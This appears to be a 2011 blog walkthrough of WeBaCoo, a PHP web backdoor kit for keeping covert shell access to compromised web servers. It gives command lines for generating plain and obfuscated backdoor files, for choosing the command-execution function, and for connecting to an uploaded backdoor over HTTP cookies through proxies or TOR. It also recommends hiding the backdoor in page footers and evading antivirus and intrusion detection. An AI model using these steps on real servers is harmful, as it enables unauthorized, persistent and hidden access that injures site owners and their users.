Sunday, December 25, 2011

How To use the Web Backdoor Cookie script-kit a.k.a. WeBaCoo

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool capable to maintain access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute system commands to the compromised server. The obfuscated communication is accomplished using HTTP header's Cookie fields under valid client HTTP requests and relative web server's responses.

OK, so if you could not tell – today I am going to give a quick overview of a recent tool release called WeBaCoo. The description from the develop can be found above, but in short it can generate PHP payload code as well as obfuscated PHP payload code for backdoor. The backdoor is connected to via webacoo.pl perl script and communication occurs through HTTP while commands are actually passed through the cookie parameters. Pretty cool stuff in my opinion! Here is my walk through with it…

In order to get started for those of you who want to take advantage of the TOR functionality you will need to also install the libio-socket-socks-perl which can be done through ppm at the command line very easily. Just drop to command line and install via ppm with this command:

COMMAND: ppm install IO:Socket::Socks

This should get you what you need to get started and on your way, here is a shot of what it looks like:

We can confirm things are working properly by just issuing the help command and reviewing all the options. If you have errors, read the messages and continue to install any other packages which may be required. You should see something like this if all went well:

OK now that we have our bases covered we can dive into things…let’s start creating some backdoors with this great little tool kit. We will first be creating a simple backdoor without any obfuscation and then we will work our way up from there. We start by with a simple command following the syntax outlined in the help menu:

COMMAND: webacoo.pl –g –r –o /path/to/output/default-backdoor.php

This will generate code for a backdoor (-g) without any obfuscation (-r) and will output it where we want and named as provided with the “-o” argument. That is all that is needed for creating a basic PHP backdoor. Here is a screenshot of the command terminal view:


Here is a quick view of the generated code:


Now the default setting is to run the code generation without the “-r” option so that the generated code is obfuscated to allow it to remain under the radar a bit longer than average. The NON “-r” version of the same command above:

It results in the following code being generated as a result:


As you can see there is a noticeable difference which is going to aid in preventing it from being detected by basic source code analyzers and/or anti-virus type scans. If the system does not allow the use of the system() function to execute commands you can also have this modified upon code generation by taking advantage of the “-f” argument followed by the number which represents the command method you would like to leverage.


The options for the “-f” arguments are:
                                1: system()        
*This is used as the default
                                2: shell_exec()
                                3: exec()
                                4: passthru()
                                5: popen()

The syntax works the same as our initial code generation with the simple addition of the new argument and options. Here is a quick example of switching to the passthru() method for command execution:

COMMAND: webacoo.pl –g –f 4 –o /path/to/output/backdoor-sys-alt.php


Output results appear as follows:

Output results for the “-r” option so you can get an idea of what is going on:


OK, so that covers the basic creation of the PHP backdoor code which we will be using. I will leave it up to you to get your code uploaded onto the target server, there are many methods and many have been documented here on this blog. Once the code is uploaded to our target server we can use it to create a terminal like experience using HTTP client server relationship (I should mention I also like to hide it in footers or specific pages to allow quick and easy re-entry later if needed). As noted by its makers: “The obfuscated communication is accomplished using HTTP header's Cookie fields under valid client HTTP requests and relative web server's responses.” Assuming we have our code uploaded, I will now show you how it works in action. In order to connect to our uploaded backdoor we just use a few very simple commands:

COMMAND: webacoo.pl –t –u http://www.site.com/backdoor.php
NOTE: You need to include the http:// portion of the URL on connection or you will get an error message relating to line 106 relating to host value…

WeBaCoo will start off by trying to get some basic info for you, but the default commands are setup for a Linux environment. You might get a small error message upon connection to Windows environment as shown above but it should not give you any problems. In Linux you will be greeted with the id of the current user. You can now go about executing commands on the remote target as if you were sitting there – game over! If you want to see the headers that are being sent in the terminal you can increase the verbosity level, but I prefer to use the defaults as it can really clutter the terminal screen. Here is a quick view of what the request looks like to initialize the shell:
If you don’t have a VPN and still want to keep yourself remaining anonymous, WeBaCoo has also included support for Proxies as well as the TOR network (in the latest release). We can activate proxy or TOR support by using a few additional flags or arguments to our above command structure; it should look like one of the following depending on your situation:

Enable Proxy Support:
COMMAND: webacoo.pl –t –u http://www.site.com/backdoor.php -p <IP>:port

Enable Authenticated Proxy Support:
COMMAND: webacoo.pl –t –u http://www.site.com/backdoor.php -p user:pass:<IP>:port

Enable TOR Support:
COMMAND: webacoo.pl –t –u http://www.site.com/backdoor.php -p tor

NOTE: You can change the default port setting of 9050 on 127.0.0.1 by altering the value set on line 38 of the webacoo.pl file itself (most of the script is well commented for easy edits). Also note that I was unable to properly get connected to the remote host due to problems establishing socks connections, possibly due to Winblows environment but still remain unclear to me…

OK, well this brings it to an end for my walk through with WeBaCoo. This tool is very cool and indeed handy as well. I encourage you to check it out, as it is very easy to use and pickup. The source is also well commented making it easy to edit if and where needed. Continue your thirst for knowledge and innovation, and as always Enjoy!

BONUS VIDEO:

No comments:

Post a Comment